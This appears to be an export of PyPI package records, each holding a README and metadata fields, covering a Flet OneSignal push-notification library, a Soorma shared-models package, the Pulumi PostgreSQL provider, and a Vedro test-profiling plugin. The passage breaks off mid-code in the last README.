await onesignal.user.set_language("es") # Spanish
await onesignal.user.set_language("en") # English
# You can also use the Language enum for auto-complete support
await onesignal.user.set_language(fos.Language.PORTUGUESE.value)
await onesignal.user.set_language(fos.Language.SPANISH.value)
```
---
## Push Notifications
### Requesting Permission
You must request permission before sending push notifications:
```python
# Request permission with fallback to settings
granted = await onesignal.notifications.request_permission(
    fallback_to_settings=True  # Opens settings if previously denied
)

if granted:
    print("User granted notification permission!")
else:
    print("User denied notification permission")
```
### Check Permission Status
```python
# Check if permission can be requested (not yet prompted)
can_request = await onesignal.notifications.can_request_permission()
# Check current permission status
has_permission = await onesignal.notifications.get_permission()
```
### iOS Provisional Authorization
Request provisional (quiet) authorization on iOS 12+:
```python
# Notifications will be delivered quietly to Notification Center
authorized = await onesignal.notifications.register_for_provisional_authorization()
```
### Managing Notifications
```python
# Clear all notifications from the notification center
await onesignal.notifications.clear_all()
# Remove a specific notification (Android only)
await onesignal.notifications.remove_notification(notification_id)
# Remove a group of notifications (Android only)
await onesignal.notifications.remove_grouped_notifications("group_key")
```
### Foreground Display Control
Control whether notifications are shown when the app is in the foreground:
```python
# Inside on_notification_foreground handler:
# Prevent a notification from being displayed
await onesignal.notifications.prevent_default(e.notification_id)
# Later, allow display if needed
await onesignal.notifications.display(e.notification_id)
```
### Push Subscription Control
```python
# Opt user into push notifications
await onesignal.user.opt_in_push()
# Opt user out of push notifications
await onesignal.user.opt_out_push()
# Check if user is opted in
is_opted_in = await onesignal.user.is_push_opted_in()
# Get push subscription details
subscription_id = await onesignal.user.get_push_subscription_id()
push_token = await onesignal.user.get_push_subscription_token()
```
### Handling Notification Events
```python
def on_notification_click(e: fos.OSNotificationClickEvent):
    """Called when user taps on a notification."""
    print(f"Notification clicked: {e.notification}")
    print(f"Action ID: {e.action_id}")  # If action buttons were used

def on_notification_foreground(e: fos.OSNotificationWillDisplayEvent):
    """Called when notification received while app is in foreground."""
    print(f"Notification received: {e.notification}")
    print(f"Notification ID: {e.notification_id}")
    # Optionally prevent display and handle manually:
    # await onesignal.notifications.prevent_default(e.notification_id)
    # Later, allow display if needed:
    # await onesignal.notifications.display(e.notification_id)

def on_permission_change(e: fos.OSPermissionChangeEvent):
    """Called when notification permission status changes."""
    print(f"Permission granted: {e.permission}")

# Register handlers when creating OneSignal instance
onesignal = fos.OneSignal(
    app_id=ONESIGNAL_APP_ID,
    on_notification_click=on_notification_click,
    on_notification_foreground=on_notification_foreground,
    on_permission_change=on_permission_change,
)
```
---
## In-App Messages
In-App Messages (IAMs) are messages displayed within your app based on triggers.
### Triggers
Triggers determine when IAMs are displayed:
```python
# Add a trigger
await onesignal.in_app_messages.add_trigger("level_completed", "5")
# Add multiple triggers
await onesignal.in_app_messages.add_triggers({
    "screen": "checkout",
    "cart_value": "50",
})
# Remove a trigger
await onesignal.in_app_messages.remove_trigger("old_trigger")
# Remove multiple triggers
await onesignal.in_app_messages.remove_triggers(["trigger1", "trigger2"])
# Clear all triggers
await onesignal.in_app_messages.clear_triggers()
```
### Pausing In-App Messages
Temporarily prevent IAMs from displaying:
```python
# Pause IAM display
await onesignal.in_app_messages.pause()
# Resume IAM display
await onesignal.in_app_messages.resume()
# Check if paused
is_paused = await onesignal.in_app_messages.is_paused()
```
### IAM Event Handlers
```python
def on_iam_click(e: fos.OSInAppMessageClickEvent):
    """Called when user interacts with an IAM."""
    print(f"IAM clicked - Action: {e.result.action_id}")
    print(f"URL: {e.result.url}")
    print(f"Closing message: {e.result.closing_message}")

def on_iam_will_display(e: fos.OSInAppMessageWillDisplayEvent):
    """Called before an IAM is displayed."""
    print(f"IAM will display: {e.message}")

def on_iam_did_display(e: fos.OSInAppMessageDidDisplayEvent):
    """Called after an IAM is displayed."""
    print("IAM displayed")

def on_iam_will_dismiss(e: fos.OSInAppMessageWillDismissEvent):
    """Called before an IAM is dismissed."""
    print("IAM will dismiss")

def on_iam_did_dismiss(e: fos.OSInAppMessageDidDismissEvent):
    """Called after an IAM is dismissed."""
    print("IAM dismissed")

onesignal = fos.OneSignal(
    app_id=ONESIGNAL_APP_ID,
    on_iam_click=on_iam_click,
    on_iam_will_display=on_iam_will_display,
    on_iam_did_display=on_iam_did_display,
    on_iam_will_dismiss=on_iam_will_dismiss,
    on_iam_did_dismiss=on_iam_did_dismiss,
)
```
---
## Location
Share user location for geo-targeted messaging:
```python
# Request location permission
granted = await onesignal.location.request_permission()
# Enable location sharing
await onesignal.location.set_shared(True)
# Disable location sharing
await onesignal.location.set_shared(False)
# Check if location is being shared
is_shared = await onesignal.location.is_shared()
```
### Android Setup
On Android, the OneSignal Location module is **not included by default**. Without it, `set_shared(True)` will log `no location dependency found` and location will not work.
To enable it, you need to build your app using the `fos-build` CLI, which automatically injects the required Gradle dependencies (`com.onesignal:location`, `play-services-location`, and ProGuard rules).
**1. Install the CLI:**
```bash
# Using UV (Recommended)
uv add flet-onesignal[cli]
# Using pip
pip install flet-onesignal[cli]
# Using Poetry
poetry add flet-onesignal[cli]
```
**2. Add location permissions** to your `pyproject.toml`:
```toml
# pyproject.toml
[tool.flet.android]
permission."android.permission.ACCESS_FINE_LOCATION" = true
permission."android.permission.ACCESS_COARSE_LOCATION" = true
```
These permissions are required in the Android Manifest for the app to access the device's GPS. `ACCESS_FINE_LOCATION` enables precise GPS positioning, while `ACCESS_COARSE_LOCATION` enables approximate location via Wi-Fi/cell towers. Without them, the system will deny location access at runtime even if the user grants permission in the dialog.
**3. Enable the OneSignal Location module** via `pyproject.toml` or CLI flag:
```toml
# pyproject.toml
[tool.flet.onesignal.android]
location = true
```
```bash
# Or pass the flag directly
fos-build apk --location
```
**4. Build with `fos-build`:**
```bash
fos-build apk
```
> **Note:** Using `flet build apk` directly (without `fos-build`) will **not** inject the location module and the feature will silently fail at runtime.
---
## Outcomes
Track user actions and conversions attributed to notifications:
```python
# Track a simple outcome
await onesignal.session.add_outcome("product_viewed")
# Track a unique outcome (counted once per notification)
await onesignal.session.add_unique_outcome("app_opened")
# Track an outcome with a value (e.g., purchase amount)
await onesignal.session.add_outcome_with_value("purchase", 29.99)
```
---
## Live Activities (iOS)
Update iOS Live Activities in real-time (iOS 16.1+):
```python
# Enter a Live Activity
await onesignal.live_activities.enter(
    activity_id="delivery_12345",
    token="live_activity_push_token"
)
# Exit a Live Activity
await onesignal.live_activities.exit("delivery_12345")
# Set push-to-start token for a Live Activity type
await onesignal.live_activities.set_push_to_start_token(
    activity_type="DeliveryActivityAttributes",
    token="push_to_start_token"
)
# Remove push-to-start token
await onesignal.live_activities.remove_push_to_start_token("DeliveryActivityAttributes")
# Set up default Live Activity options
await onesignal.live_activities.setup_default()
```
---
## Privacy & Consent
For GDPR and other privacy regulations, you can require user consent before collecting data:
```python
# Create OneSignal with consent requirement
onesignal = fos.OneSignal(
    app_id=ONESIGNAL_APP_ID,
    require_consent=True,  # SDK won't collect data until consent is given
)
# After user accepts your privacy policy
await onesignal.consent_given(True)
# If user declines
await onesignal.consent_given(False)
```
> **Important:** `require_consent=True` must be set in the constructor for the consent methods to work.
> Without it, the SDK is fully active from initialization and calling `consent_given()` has no practical effect.
---
## Debugging
### Log Levels
Configure SDK logging for development:
```python
# Set log level during initialization
onesignal = fos.OneSignal(
    app_id=ONESIGNAL_APP_ID,
    log_level=fos.OSLogLevel.VERBOSE,
)
# Or change it dynamically
await onesignal.debug.set_log_level(fos.OSLogLevel.DEBUG)
# Set alert level (visual alerts for errors)
await onesignal.debug.set_alert_level(fos.OSLogLevel.ERROR)
```
**Available log levels:**
| Level | Description |
|-------|-------------|
| `NONE` | No logging |
| `FATAL` | Only fatal errors |
| `ERROR` | Errors and fatal errors |
| `WARN` | Warnings and above |
| `INFO` | Informational messages and above |
| `DEBUG` | Debug messages and above |
| `VERBOSE` | All messages including verbose details |
### Error Handling
```python
def on_error(e: fos.OSErrorEvent):
    """Called when an error occurs in the SDK."""
    print(f"Error in {e.method}: {e.message}")
    if e.stack_trace:
        print(f"Stack trace: {e.stack_trace}")

onesignal = fos.OneSignal(
    app_id=ONESIGNAL_APP_ID,
    on_error=on_error,
)
```
### Debug Console
A built-in visual console for viewing application logs during development:
```python
import flet as ft
import flet_onesignal as fos
# Set up file-based logging (writes to FLET_APP_CONSOLE or debug.log)
logger = fos.setup_logging()
async def main(page: ft.Page):
    debug_console = fos.DebugConsole()

    page.appbar = ft.AppBar(
        title=ft.Text("My App"),
        actions=[debug_console.icon],  # Bug icon opens the console
    )
    # Or use a floating action button instead
    # page.floating_action_button = debug_console.fab

    logger.info("App started")
    page.add(ft.Text("Hello World"))

ft.run(main)
```
The `DebugConsole` reads log entries written by `setup_logging()` and displays them in a filterable dialog with color-coded levels (`fos.LogLevel.DEBUG`, `INFO`, `WARNING`, `ERROR`, `CRITICAL`).
### Android Logcat Scripts
The [`scripts/`](scripts/) directory includes two logcat viewer scripts that display Android logs with **Android Studio-style colors and formatting**. They auto-detect the focused app, filter by its PID, and highlight Flet/Flutter output, Python errors, and exceptions.
**Bash version** (Linux/macOS — requires `adb` in PATH):
```bash
# Default filter (flutter, python, Error, Exception, Traceback)
./scripts/flet_log.sh
# Add extra filters
./scripts/flet_log.sh "OneSignal|Firebase"
```
**Python version** (cross-platform):
```bash
python scripts/flet_log.py
python scripts/flet_log.py "OneSignal|Firebase"
```
> **Requirement:** A device or emulator connected via `adb`. The scripts clear the logcat buffer on each app restart so you only see fresh output.
---
## API Reference
### OneSignal (Main Class)
```python
fos.OneSignal(
    app_id: str,                            # Required: Your OneSignal App ID
    log_level: OSLogLevel = None,           # Optional: SDK log level
    visual_alert_level: OSLogLevel = None,  # Optional: Visual alert level (iOS)
    require_consent: bool = False,          # Optional: Require user consent
    on_notification_click: Callable = None,
    on_notification_foreground: Callable = None,
    on_permission_change: Callable = None,
    on_user_change: Callable = None,
    on_push_subscription_change: Callable = None,
    on_iam_click: Callable = None,
    on_iam_will_display: Callable = None,
    on_iam_did_display: Callable = None,
    on_iam_will_dismiss: Callable = None,
    on_iam_did_dismiss: Callable = None,
    on_error: Callable = None,
)
```
### Event Types
| Event Class | Properties |
|-------------|------------|
| `OSNotificationClickEvent` | `notification`, `action_id` |
| `OSNotificationWillDisplayEvent` | `notification`, `notification_id` |
| `OSPermissionChangeEvent` | `permission` |
| `OSUserChangedEvent` | `state.onesignal_id`, `state.external_id` |
| `OSPushSubscriptionChangedEvent` | `id`, `token`, `opted_in` |
| `OSInAppMessageClickEvent` | `message`, `result.action_id`, `result.url`, `result.url_target`, `result.closing_message` |
| `OSInAppMessageWillDisplayEvent` | `message` |
| `OSInAppMessageDidDisplayEvent` | `message` |
| `OSInAppMessageWillDismissEvent` | `message` |
| `OSInAppMessageDidDismissEvent` | `message` |
| `OSErrorEvent` | `method`, `message`, `stack_trace` |
### Enums
```python
class OSLogLevel(Enum):
    NONE = "none"
    FATAL = "fatal"
    ERROR = "error"
    WARN = "warn"
    INFO = "info"
    DEBUG = "debug"
    VERBOSE = "verbose"
```
---
## Migration from v0.3.x
If upgrading from version 0.3.x, note these breaking changes:
| v0.3.x (Old) | v0.4.0 (New) |
|--------------|--------------|
| `fos.OneSignalSettings(app_id=...)` | `fos.OneSignal(app_id=...)` |
| `onesignal.get_onesignal_id()` | `await onesignal.user.get_onesignal_id()` |
| `onesignal.get_external_user_id()` | `await onesignal.user.get_external_id()` |
| `onesignal.login(id)` | `await onesignal.login(id)` |
| `onesignal.logout()` | `await onesignal.logout()` |
| `onesignal.set_language(code)` | `await onesignal.user.set_language(code)` |
| `onesignal.add_alias(alias, id)` | `await onesignal.user.add_alias(label, id)` |
| `onesignal.request_permission()` | `await onesignal.notifications.request_permission()` |
| `onesignal.clear_all_notifications()` | `await onesignal.notifications.clear_all()` |
| `on_notification_opened` | `on_notification_click` |
| `on_notification_received` | `on_notification_foreground` |
| `on_click_in_app_messages` | `on_iam_click` |
| `ft.app(target=main)` | `ft.run(main)` |
**Key changes:**
- All methods are now **async-only** (no `_async` suffix)
- Methods are organized into **sub-modules** (`.user`, `.notifications`, etc.)
- Uses `ft.Service` base class instead of `Control`
- New event types with structured data
---
## Troubleshooting
### Notifications not appearing
1. Verify your OneSignal App ID is correct
2. Check that you've requested and received notification permission
3. Ensure platform certificates (APNs/FCM) are configured in OneSignal dashboard
4. Check device logs for any SDK errors
### App crashes on startup
1. Verify minimum SDK versions are met
2. Check that the `OneSignal` service is added to `page.services`
3. Review the `on_error` handler for any initialization errors
### Tags not syncing
1. Tags are synced asynchronously - allow a few seconds
2. Check your network connection
3. Verify tags in the OneSignal dashboard under Users
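Because tag syncing is asynchronous, a test or startup check should poll instead of asserting immediately. A generic helper sketch (the `wait_for` name and its signature are illustrative, not part of the SDK):

```python
import asyncio

async def wait_for(predicate, timeout: float = 10.0, interval: float = 0.5):
    """Poll an async predicate until it returns a truthy value or the timeout expires.

    Returns the truthy result, or None on timeout.
    """
    loop = asyncio.get_running_loop()
    deadline = loop.time() + timeout
    while True:
        result = await predicate()
        if result:
            return result
        if loop.time() >= deadline:
            return None
        await asyncio.sleep(interval)
```

For example, `tags = await wait_for(onesignal.user.get_tags, timeout=5)` waits a few seconds for the documented `get_tags()` call to return the synced tags rather than failing on the first empty read.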
---
## Example App
A complete example demonstrating all features is available in the [`examples/flet_onesignal_example`](examples/flet_onesignal_example) directory.
It includes pages for each module — login, notifications, tags, aliases, in-app messages, location, session outcomes and more — built with Flet's declarative UI.
To run:
```bash
cd examples/flet_onesignal_example
uv sync
uv run python src/main.py
```
---
## 🌐 Community
Join the community to contribute or get help:
- [Discord](https://discord.gg/dzWXP8SHG8)
- [GitHub Issues](https://github.com/brunobrown/flet-asp/issues)
## ⭐ Support
If you like this project, please give it a [GitHub star](https://github.com/brunobrown/flet-asp) ⭐
---
## 🤝 Contributing
Contributions and feedback are welcome!
1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed explanation
For feedback, [open an issue](https://github.com/brunobrown/flet-asp/issues) with your suggestions.
---
## Try **flet-onesignal** today and enhance your Flet apps with push notifications!
---
<p align="center"><img src="https://github.com/user-attachments/assets/431aa05f-5fbc-4daa-9689-b9723583e25a" width="50%"></p>
<p align="center"><a href="https://www.bible.com/bible/116/PRO.16.NLT"> Commit your work to the LORD, and your plans will succeed. Proverbs 16:3</a></p>
| text/markdown | null | brunobrown <brunobrown.86@gmail.com> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries",
"Natural Language :: English",
"Natural Language :: Portuguese (Brazilian)"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"flet>=0.80.0",
"tomli>=1.0.0; python_version < \"3.11\"",
"rich>=13.0.0; extra == \"cli\"",
"watchdog>=3.0.0; extra == \"cli\""
] | [] | [] | [] | [
"Homepage, https://github.com/brunobrown/flet-onesignal",
"Documentation, https://brunobrown.github.io/flet-onesignal",
"Repository, https://github.com/brunobrown/flet-onesignal",
"Issues, https://github.com/brunobrown/flet-onesignal/issues",
"Changelog, https://github.com/brunobrown/flet-onesignal/blob/main/CHANGELOG.md"
] | uv/0.10.3 {"installer":{"name":"uv","version":"0.10.3","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Linux Mint","version":"22.3","id":"zena","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:39:47.659675 | flet_onesignal-0.4.3.tar.gz | 50,669 | 07/c9/6e91c04fe21451130743df58f04098f5dc33eaa948f4b78e39e3d2b61c50/flet_onesignal-0.4.3.tar.gz | source | sdist | null | false | 651ba682a6e9516e254ca9d92310e4e0 | 64b72501516207f2113753e00720af93b1f7950ad129029237e764a4516966e8 | 07c96e91c04fe21451130743df58f04098f5dc33eaa948f4b78e39e3d2b61c50 | MIT | [
"LICENSE"
] | 259 |
2.4 | soorma-common | 0.7.7 | Common models and DTOs for Soorma platform services | # Soorma Common
Common models and DTOs shared across Soorma platform services.
## Installation
```bash
pip install -e .
```
## Usage
```python
from soorma_common.models import (
    AgentDefinition,
    AgentCapability,
    EventDefinition,
    SemanticMemoryCreate,
    EpisodicMemoryCreate,
    WorkingMemorySet,
)

# Create an agent definition
agent = AgentDefinition(
    agent_id="my-agent",
    name="My Agent",
    description="A sample agent",
    capabilities=[
        AgentCapability(
            task_name="process_data",
            description="Process incoming data",
            consumed_event="data.received",
            produced_events=["data.processed", "data.error"]
        )
    ]
)

# Create semantic memory (knowledge storage)
semantic = SemanticMemoryCreate(
    agent_id="researcher",
    content="Python is a high-level programming language",
    metadata={"category": "programming", "source": "textbook"}
)

# Create episodic memory (interaction history)
episodic = EpisodicMemoryCreate(
    agent_id="assistant",
    role="user",
    content="What is the weather like today?",
    metadata={"session_id": "abc-123"}
)

# Create working memory (plan state)
working = WorkingMemorySet(
    value={"current_step": 2, "total_steps": 5, "status": "in_progress"}
)
```
## Models
### Agent Registry
- `AgentCapability` - Describes a single capability or task an agent can perform
- `AgentDefinition` - Defines a single agent in the system
- `AgentRegistrationRequest` - Request to register a new agent
- `AgentRegistrationResponse` - Response after registering an agent
- `AgentQueryRequest` - Request to query agents
- `AgentQueryResponse` - Response containing agent definitions
### Event Registry
- `EventDefinition` - Defines a single event in the system
- `EventRegistrationRequest` - Request to register a new event
- `EventRegistrationResponse` - Response after registering an event
- `EventQueryRequest` - Request to query events
- `EventQueryResponse` - Response containing event definitions
### Memory Service (CoALA Framework)
The Memory Service implements the CoALA (Cognitive Architectures for Language Agents) framework with four memory types:
> **Authentication Note**: Memory Service supports dual authentication:
> - **JWT Token** (User sessions): Provides `tenant_id` + `user_id` from token
> - **API Key** (Agent operations): Provides `tenant_id` + `agent_id`, requires explicit `user_id` in request parameters
>
> See [Memory Service SDK documentation](../../sdk/python/docs/MEMORY_SERVICE.md) for details.
#### Semantic Memory (Knowledge Base)
- `SemanticMemoryCreate` - Add knowledge to semantic memory
- `SemanticMemoryResponse` - Semantic memory entry with similarity score
- **Use cases**: Store facts, documentation, learned information
- **Features**: Vector search, RAG (Retrieval-Augmented Generation)
- **Scoping**: Tenant-level (shared across users in tenant)
#### Episodic Memory (Interaction History)
- `EpisodicMemoryCreate` - Log an interaction or event
- `EpisodicMemoryResponse` - Episodic memory entry with timestamp
- **Use cases**: Conversation history, user interactions, audit logs
- **Features**: Temporal recall, role-based filtering (user/assistant/system/tool)
- **Scoping**: Tenant + User + Agent (user-specific conversation history)
#### Procedural Memory (Skills & Procedures)
- `ProceduralMemoryResponse` - Skill or procedure with trigger conditions
- **Use cases**: Dynamic prompts, few-shot examples, user-specific agent customization
- **Features**: Context-aware retrieval, trigger-based activation, personalization
- **Scoping**: Tenant + User + Agent (enables per-user agent customization)
#### Working Memory (Plan State)
- `WorkingMemorySet` - Store plan-scoped state
- `WorkingMemoryResponse` - Working memory entry
- **Use cases**: Multi-agent collaboration, plan execution state, shared variables
- **Features**: Plan-scoped isolation, key-value storage
- **Scoping**: Tenant + Plan (shared state within plan execution)
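Conceptually, plan-scoped working memory behaves like a key-value store partitioned by `(tenant, plan)`. A toy illustration of this isolation (this is not the service's implementation, just the scoping model):

```python
from collections import defaultdict

# Each (tenant_id, plan_id) pair gets its own isolated key-value namespace.
_store: dict = defaultdict(dict)

def set_value(tenant_id: str, plan_id: str, key: str, value):
    _store[(tenant_id, plan_id)][key] = value

def get_value(tenant_id: str, plan_id: str, key: str):
    return _store[(tenant_id, plan_id)].get(key)

set_value("acme", "plan-1", "current_step", 2)
set_value("acme", "plan-2", "current_step", 7)

print(get_value("acme", "plan-1", "current_step"))  # 2 -- plan-2 state is isolated
print(get_value("acme", "plan-3", "current_step"))  # None -- unseen plan starts empty
```

Agents collaborating on the same plan see the same state; agents on other plans (or other tenants) never do.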
## Memory Service Examples
### Semantic Memory (Knowledge Storage)
```python
from soorma_common.models import SemanticMemoryCreate
# Store knowledge
memory = SemanticMemoryCreate(
agent_id="researcher",
content="FastAPI is a modern web framework for Python",
metadata={"category": "web-dev", "language": "python"}
)
```
### Episodic Memory (Interaction History)
```python
from soorma_common.models import EpisodicMemoryCreate
# Log user interaction
memory = EpisodicMemoryCreate(
agent_id="chatbot",
role="user", # user, assistant, system, tool
content="How do I deploy to production?",
metadata={"session_id": "session-123", "timestamp": "2025-12-23T10:00:00Z"}
)
```
### Working Memory (Plan State)
```python
from soorma_common.models import WorkingMemorySet
# Store plan execution state
state = WorkingMemorySet(
value={
"plan_id": "research-plan-1",
"current_phase": "data_collection",
"completed_tasks": ["search", "filter"],
"pending_tasks": ["analyze", "report"],
"research_summary": "Found 50 relevant papers..."
}
)
```
## Development
```bash
# Install in editable mode
pip install -e .
# Run tests
pytest
# Build package
python -m build
```
## Version History
See [CHANGELOG.md](CHANGELOG.md) for version history and release notes.
| text/markdown | null | null | null | null | MIT | null | [] | [] | null | null | >=3.11 | [] | [] | [] | [
"pydantic>=2.0.0",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest>=7.0.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:39:32.156381 | soorma_common-0.7.7.tar.gz | 10,837 | 90/ba/489f18d708b5576f6925e85976ca46d5e997774067583820a7d0aa21607f/soorma_common-0.7.7.tar.gz | source | sdist | null | false | 49fe3b660ea9ba9555895dd2d77234a3 | 4ac2ac364d504ede1b813dd3a1d0f8862f59067563b850d726cec16f3db7bdbb | 90ba489f18d708b5576f6925e85976ca46d5e997774067583820a7d0aa21607f | null | [] | 222 |
2.4 | pulumi-postgresql | 3.17.0a1771569079 | A Pulumi package for creating and managing postgresql cloud resources. | [](https://github.com/pulumi/pulumi-postgresql/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/postgresql)
[](https://pypi.org/project/pulumi-postgresql)
[](https://badge.fury.io/nu/pulumi.postgresql)
[](https://pkg.go.dev/github.com/pulumi/pulumi-postgresql/sdk/v3/go)
[](https://github.com/pulumi/pulumi-postgresql/blob/master/LICENSE)
# postgresql Resource Provider
The postgresql resource provider for Pulumi lets you manage postgresql resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:

```bash
$ npm install @pulumi/postgresql
```

or `yarn`:

```bash
$ yarn add @pulumi/postgresql
```
### Python
To use from Python, install using `pip`:

```bash
$ pip install pulumi_postgresql
```
### Go
To use from Go, use `go get` to grab the latest version of the library:

```bash
$ go get github.com/pulumi/pulumi-postgresql/sdk/v3
```
### .NET
To use from .NET, install using `dotnet add package`:

```bash
$ dotnet add package Pulumi.Postgresql
```
## Configuration
The following configuration points are available:
- `postgresql:host` - (required) The address for the postgresql server connection. Can also be specified with the `PGHOST`
environment variable.
- `postgresql:port` - (optional) The port for the postgresql server connection. The default is `5432`. Can also be specified
with the `PGPORT` environment variable.
- `postgresql:database` - (optional) Database to connect to. The default is `postgres`. Can also be specified
with the `PGDATABASE` environment variable.
- `postgresql:username` - (required) Username for the server connection. The default is `postgres`. Can also be specified
with the `PGUSER` environment variable.
- `postgresql:password` - (optional) Password for the server connection. Can also be specified with the `PGPASSWORD` environment variable.
- `postgresql:database_username` - (optional) Username of the user in the database if different than connection username (See user name maps).
- `postgresql:superuser` - (optional) Should be set to false if the user to connect is not a PostgreSQL superuser (as is the case in RDS).
In this case, some features might be disabled (e.g.: Refreshing state password from database).
- `postgresql:sslmode` - (optional) Set the priority for an SSL connection to the server. Valid values for sslmode are (note: prefer is not supported by Go's lib/pq):
* `disable` - No ssl
* `require` - always SSL (the default, also skip verification)
* `verify-ca` - always SSL (verify that the certificate presented by the server was signed by a trusted CA)
* `verify-full` - always SSL (verify that the certificate presented by the server was signed by a trusted CA and the server
host name matches the one in the certificate) Additional information on the options and their implications can be seen in the libpq(3) SSL guide.
Can also be specified with the `PGSSLMODE` environment variable.
- `postgresql:connect_timeout` - (optional) Maximum wait for connection, in seconds. The default is `180s`. Zero or not specified means wait indefinitely.
Can also be specified with the `PGCONNECT_TIMEOUT` environment variable.
- `postgresql:max_connections` - (optional) Set the maximum number of open connections to the database. The default is `4`. Zero means unlimited open connections.
- `postgresql:expected_version` - (optional) A hint to the provider regarding the expected PostgreSQL version it will be talking with. This hint is
required in order for the provider to talk with an ancient version of PostgreSQL. This parameter is expected to be a PostgreSQL version or `current`.
Once a connection has been established, the provider will fingerprint the actual version. Default: 9.0.0.
- `postgresql:clientcert` - (optional) Clientcert block for configuring SSL certificate.
- `postgresql:clientcert.cert` - (required) The SSL client certificate file path. The file must contain PEM encoded data.
- `postgresql:clientcert.key` - (required) The SSL client certificate private key file path. The file must contain PEM encoded data.
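These configuration points are set per-stack with `pulumi config set`; a sketch for a local development server (the host and credential values are illustrative):

```bash
# Point the provider at a local server (values are illustrative)
pulumi config set postgresql:host localhost
pulumi config set postgresql:port 5432
pulumi config set postgresql:username postgres
pulumi config set postgresql:sslmode disable

# Store the password encrypted in the stack configuration (prompts for the value)
pulumi config set --secret postgresql:password
```

Values not set here fall back to the corresponding `PG*` environment variables where noted above.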
## Reference
For further information, please visit [the postgresql provider docs](https://www.pulumi.com/docs/intro/cloud-providers/postgresql) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/postgresql).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, postgresql | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-postgresql"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:39:22.192117 | pulumi_postgresql-3.17.0a1771569079.tar.gz | 51,050 | 0d/23/252125e6d2fd840c2123d2021ad4d1c1c2d689e073b1dcb1774bd94a31b0/pulumi_postgresql-3.17.0a1771569079.tar.gz | source | sdist | null | false | f741a6b04ebbfa1a87f0e43dd940bd75 | baaaf58b69b41661de2e4cd3deacbfa984cbd9590b1d52fa361f820532e3cf67 | 0d23252125e6d2fd840c2123d2021ad4d1c1c2d689e073b1dcb1774bd94a31b0 | null | [] | 213 |
2.4 | vedro-profiling | 0.2.0 | Plugin for Vedro framework for measuring resource usage of tests | # Vedro profiling
[](https://pypi.python.org/pypi/vedro-profiling/)
[](https://pypi.python.org/pypi/vedro-profiling/)
[](https://pypi.python.org/pypi/vedro-profiling/)
> **Vedro profiling** - a plugin for the [Vedro](https://vedro.io/) framework that measures resource usage of tests
The plugin measures CPU and memory usage during test execution and exports metrics in k6-compatible NDJSON format, making it easy to integrate with performance monitoring tools like Grafana, InfluxDB, and other observability platforms.
## Installation
<details open>
<summary>Quick</summary>
<p>
For a quick installation, you can use a plugin manager as follows:
```shell
$ vedro plugin install vedro-profiling
```
</p>
</details>
<details>
<summary>Manual</summary>
<p>
To install manually, follow these steps:
1. Install the package using pip:
```shell
$ pip3 install vedro-profiling
```
2. Next, activate the plugin in your `vedro.cfg.py` configuration file:
```python
# ./vedro.cfg.py
import vedro
import vedro_profiling
class Config(vedro.Config):
class Plugins(vedro.Config.Plugins):
class VedroProfiling(vedro_profiling.VedroProfiling):
enabled = True
```
</p>
</details>
## Usage
### Basic Usage
Enable profiling for your test run:
```shell
$ vedro run --enable-profiling
```
This will create a `.profiling/profiling.ndjson` file with CPU and memory metrics in k6-compatible format.
### With Custom Run ID
```shell
$ vedro run --enable-profiling --run-id load-test-2026-01-26
```
### With Visualization
Generate matplotlib plots alongside the metrics:
```shell
$ vedro run --enable-profiling --draw-plots
```
## Configuration
### Advanced Configuration
```python
# ./vedro.cfg.py
import vedro
import vedro_profiling
class Config(vedro.Config):
class Plugins(vedro.Config.Plugins):
class VedroProfiling(vedro_profiling.VedroProfiling):
enabled = True
enable_profiling = True
# Profiling methods: "default" (psutil), "docker" (containers)
profiling_methods = ["default", "docker"]
# Polling interval in seconds
poll_time = 1.0
# Generate plots
draw_plots = True
# Docker Compose project name for container monitoring
docker_compose_project_name = "my-project"
# Custom run identifier
profiling_run_id = "staging-load-test"
# Additional tags for metrics
additional_tags = {
"env": "staging",
"team": "performance",
"region": "us-east-1"
}
```
## Output Format
The plugin generates metrics in **NDJSON (newline-delimited JSON)** format compatible with k6 and other performance monitoring tools.
### File Location
- Metrics: `.profiling/profiling.ndjson`
- Plots (if enabled): `.profiling/*.png`
### NDJSON Structure
The output file contains metric definitions followed by data points:
```json
{"type":"Metric","metric":"cpu_percent","data":{"type":"gauge","unit":"percent"}}
{"type":"Metric","metric":"memory_usage","data":{"type":"gauge","unit":"megabytes"}}
{"type":"Point","metric":"cpu_percent","data":{"time":"2026-01-26T10:00:00.123Z","value":25.5,"tags":{"target":"app-1","method":"docker","run":"my-test-123"}}}
{"type":"Point","metric":"memory_usage","data":{"time":"2026-01-26T10:00:00.123Z","value":512.3,"tags":{"target":"app-1","method":"docker","run":"my-test-123"}}}
```
### Metrics
- `cpu_percent` - CPU usage percentage (gauge)
- `memory_usage` - Memory usage in megabytes (gauge)
### Tags
Each data point includes the following tags:
- `target` - Container name or process name
- `method` - Profiling method (`docker` or `default`)
- `run` - Unique run identifier
- Custom tags from configuration
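Since each data point carries its tags inline, points can be filtered directly in Python as well. A minimal sketch, using inline sample lines in the format shown above instead of the real `.profiling/profiling.ndjson`:

```python
import json

# Sample NDJSON lines in the format shown above (inline for illustration).
lines = [
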